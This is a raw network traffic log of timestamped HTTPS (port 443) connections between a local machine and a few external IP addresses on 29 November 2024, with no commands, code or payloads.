                                                                                                                                      Nov 29, 2024 23:10:58.919950008 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:58.919971943 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:58.920052052 CET49777443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:58.920059919 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:58.920108080 CET49777443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:58.962820053 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:58.962836027 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:58.962904930 CET49777443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:58.962912083 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:58.962956905 CET49777443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:58.984518051 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:58.984534025 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:58.984607935 CET49777443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:58.984615088 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:58.984659910 CET49777443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:59.003346920 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.003364086 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.003489971 CET49777443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:59.003495932 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.003535986 CET49777443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:59.110440969 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.110455990 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.110536098 CET49777443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:59.110546112 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.110586882 CET49777443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:59.130336046 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.130350113 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.130407095 CET49777443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:59.130414009 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.130454063 CET49777443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:59.147623062 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.147638083 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.147718906 CET49777443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:59.147726059 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.147762060 CET49777443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:59.159104109 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.159117937 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.159296036 CET49777443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:59.159301996 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.159347057 CET49777443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:59.168960094 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.168975115 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.169044018 CET49777443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:59.169051886 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.169092894 CET49777443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:59.170552969 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.170602083 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.170667887 CET49777443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:59.171299934 CET49777443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:59.171310902 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.201570988 CET49781443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:59.201577902 CET49780443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:59.201602936 CET4434978013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.201668978 CET4434978113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.201745987 CET49780443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:59.201961994 CET49780443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:59.201970100 CET49781443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:59.201972961 CET4434978013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.202064991 CET49781443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:59.202102900 CET4434978113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.203161001 CET49782443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:59.203169107 CET4434978213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.203227997 CET49782443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:59.203639984 CET49782443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:59.203649998 CET4434978213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.204813004 CET49783443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:59.204837084 CET4434978313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.204906940 CET49783443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:59.205019951 CET49783443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:59.205046892 CET4434978313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.205512047 CET49784443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:59.205542088 CET4434978413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.205734015 CET49784443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:59.206001997 CET49784443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:59.206013918 CET4434978413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.322349072 CET4434977820.109.210.53192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.322369099 CET4434977820.109.210.53192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.322387934 CET4434977820.109.210.53192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.322433949 CET49778443192.168.2.420.109.210.53
                                                                                                                                      Nov 29, 2024 23:10:59.322451115 CET4434977820.109.210.53192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.322469950 CET49778443192.168.2.420.109.210.53
                                                                                                                                      Nov 29, 2024 23:10:59.322488070 CET49778443192.168.2.420.109.210.53
                                                                                                                                      Nov 29, 2024 23:10:59.359332085 CET4434977820.109.210.53192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.359368086 CET4434977820.109.210.53192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.359411001 CET4434977820.109.210.53192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.359416008 CET49778443192.168.2.420.109.210.53
                                                                                                                                      Nov 29, 2024 23:10:59.359458923 CET49778443192.168.2.420.109.210.53
                                                                                                                                      Nov 29, 2024 23:10:59.359523058 CET49778443192.168.2.420.109.210.53
                                                                                                                                      Nov 29, 2024 23:10:59.359535933 CET4434977820.109.210.53192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.359549999 CET49778443192.168.2.420.109.210.53
                                                                                                                                      Nov 29, 2024 23:10:59.359555006 CET4434977820.109.210.53192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:00.923600912 CET4434978113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:00.924658060 CET49781443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:00.924756050 CET4434978113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:00.925129890 CET49781443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:00.925148010 CET4434978113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:00.943037987 CET4434978213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:00.943365097 CET49782443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:00.943386078 CET4434978213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:00.943742990 CET49782443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:00.943753958 CET4434978213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.000787020 CET4434978013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.001111984 CET49780443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:01.001127958 CET4434978013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.001487970 CET49780443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:01.001497030 CET4434978013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.003191948 CET4434978313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.003515959 CET49783443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:01.003552914 CET4434978313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.003897905 CET49783443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:01.003910065 CET4434978313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.358750105 CET4434978113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.358795881 CET4434978113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.358942032 CET49781443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:01.359188080 CET49781443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:01.359188080 CET49781443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:01.359229088 CET4434978113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.359253883 CET4434978113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.362538099 CET49785443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:01.362574100 CET4434978513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.362642050 CET49785443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:01.362767935 CET49785443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:01.362782955 CET4434978513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.384800911 CET4434978213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.384820938 CET4434978213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.384874105 CET49782443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:01.384885073 CET4434978213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.385018110 CET49782443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:01.385059118 CET49782443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:01.385063887 CET4434978213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.385078907 CET49782443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:01.385205030 CET4434978213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.385235071 CET4434978213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.385277033 CET49782443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:01.387032986 CET49786443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:01.387063026 CET4434978613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.387129068 CET49786443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:01.387231112 CET49786443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:01.387243032 CET4434978613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.399844885 CET4434978413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.400161982 CET49784443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:01.400175095 CET4434978413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.400571108 CET49784443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:01.400574923 CET4434978413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.449340105 CET4434978313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.449378014 CET4434978313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.449467897 CET49783443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:01.449554920 CET49783443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:01.449556112 CET49783443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:01.449589968 CET4434978313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.449614048 CET4434978313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.450481892 CET4434978013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.450509071 CET4434978013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.450567961 CET49780443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:01.450578928 CET4434978013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.450615883 CET49780443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:01.450733900 CET49780443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:01.450733900 CET49780443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:01.450737953 CET4434978013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.450845003 CET4434978013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.450870037 CET4434978013.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.450928926 CET49780443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:01.452265978 CET49787443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:01.452279091 CET4434978713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.453471899 CET49788443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:01.453490973 CET4434978813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.453516006 CET49787443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:01.453538895 CET49788443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:01.453629971 CET49787443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:01.453643084 CET4434978713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.453694105 CET49788443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:01.453706980 CET4434978813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.860614061 CET4434978413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.860630035 CET4434978413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.860671043 CET49784443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:01.860682011 CET4434978413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.861274958 CET4434978413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.861325979 CET49784443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:01.861486912 CET49784443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:01.861495018 CET4434978413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.861510038 CET49784443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:01.861515045 CET4434978413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.864342928 CET49789443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:01.864382982 CET4434978913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:01.864449978 CET49789443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:01.864567995 CET49789443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:01.864588976 CET4434978913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:03.169589043 CET4434978613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:03.170140028 CET49786443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:03.170152903 CET4434978613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:03.170614958 CET49786443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:03.170620918 CET4434978613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:03.216881037 CET4434978513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:03.217206955 CET49785443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:03.217242956 CET4434978513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:03.217577934 CET49785443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:03.217583895 CET4434978513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:03.262718916 CET4434978713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:03.263011932 CET49787443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:03.263021946 CET4434978713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:03.263336897 CET49787443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:03.263341904 CET4434978713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:03.348282099 CET4434978813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:03.348800898 CET49788443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:03.348812103 CET4434978813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:03.349199057 CET49788443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:03.349205017 CET4434978813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:03.532903910 CET49790443192.168.2.4142.250.181.100
                                                                                                                                      Nov 29, 2024 23:11:03.532923937 CET44349790142.250.181.100192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:03.532996893 CET49790443192.168.2.4142.250.181.100
                                                                                                                                      Nov 29, 2024 23:11:03.533206940 CET49790443192.168.2.4142.250.181.100
                                                                                                                                      Nov 29, 2024 23:11:03.533216000 CET44349790142.250.181.100192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:03.586708069 CET4434978913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:03.587066889 CET49789443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:03.587090015 CET4434978913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:03.587441921 CET49789443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:03.587449074 CET4434978913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:03.613611937 CET4434978613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:03.613656044 CET4434978613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:03.613733053 CET49786443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:03.613970995 CET49786443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:03.613977909 CET4434978613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:03.613987923 CET49786443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:03.613991976 CET4434978613.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:03.616477966 CET49791443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:03.616503000 CET4434979113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:03.616573095 CET49791443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:03.616709948 CET49791443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:03.616724014 CET4434979113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:03.670933008 CET4434978513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:03.670978069 CET4434978513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:03.671045065 CET49785443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:03.671241045 CET49785443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:03.671261072 CET4434978513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:03.671268940 CET49785443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:03.671273947 CET4434978513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:03.673659086 CET49792443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:03.673675060 CET4434979213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:03.673749924 CET49792443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:03.673882961 CET49792443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:03.673893929 CET4434979213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:03.707257986 CET4434978713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:03.707299948 CET4434978713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:03.707422972 CET49787443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:03.707449913 CET49787443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:03.707454920 CET4434978713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:03.707468033 CET49787443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:03.707470894 CET4434978713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:03.709122896 CET49793443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:03.709144115 CET4434979313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:03.709199905 CET49793443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:03.709305048 CET49793443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:03.709317923 CET4434979313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:03.801924944 CET4434978813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:03.801976919 CET4434978813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:03.802026987 CET49788443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:03.802124977 CET49788443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:03.802133083 CET4434978813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:03.802145004 CET49788443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:03.802149057 CET4434978813.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:03.803777933 CET49794443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:03.803788900 CET4434979413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:03.803868055 CET49794443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:03.803953886 CET49794443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:03.803963900 CET4434979413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:04.021416903 CET4434978913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:04.021475077 CET4434978913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:04.021552086 CET49789443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:04.021737099 CET49789443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:04.021756887 CET4434978913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:04.021770000 CET49789443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:04.021775007 CET4434978913.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:04.024262905 CET49795443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:04.024316072 CET4434979513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:04.024379969 CET49795443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:04.024508953 CET49795443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:04.024523973 CET4434979513.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:05.275511026 CET44349790142.250.181.100192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:05.275752068 CET49790443192.168.2.4142.250.181.100
                                                                                                                                      Nov 29, 2024 23:11:05.275767088 CET44349790142.250.181.100192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:05.276613951 CET44349790142.250.181.100192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:05.276678085 CET49790443192.168.2.4142.250.181.100
                                                                                                                                      Nov 29, 2024 23:11:05.277561903 CET49790443192.168.2.4142.250.181.100
                                                                                                                                      Nov 29, 2024 23:11:05.277611971 CET44349790142.250.181.100192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:05.330174923 CET49790443192.168.2.4142.250.181.100
                                                                                                                                      Nov 29, 2024 23:11:05.330182076 CET44349790142.250.181.100192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:05.345884085 CET4434979113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:05.346301079 CET49791443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:05.346316099 CET4434979113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:05.346714020 CET49791443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:05.346719980 CET4434979113.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:05.377063990 CET49790443192.168.2.4142.250.181.100
                                                                                                                                      Nov 29, 2024 23:11:05.525240898 CET4434979413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:05.525634050 CET49794443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:05.525660038 CET4434979413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:05.526087046 CET49794443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:05.526092052 CET4434979413.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:05.527456045 CET4434979213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:05.527748108 CET49792443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:05.527759075 CET4434979213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:05.528120995 CET49792443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:05.528125048 CET4434979213.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:05.553251028 CET4434979313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:05.553672075 CET49793443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:05.553693056 CET4434979313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:05.554052114 CET49793443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:11:05.554058075 CET4434979313.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:11:05.799384117 CET4434979113.107.246.63192.168.2.4
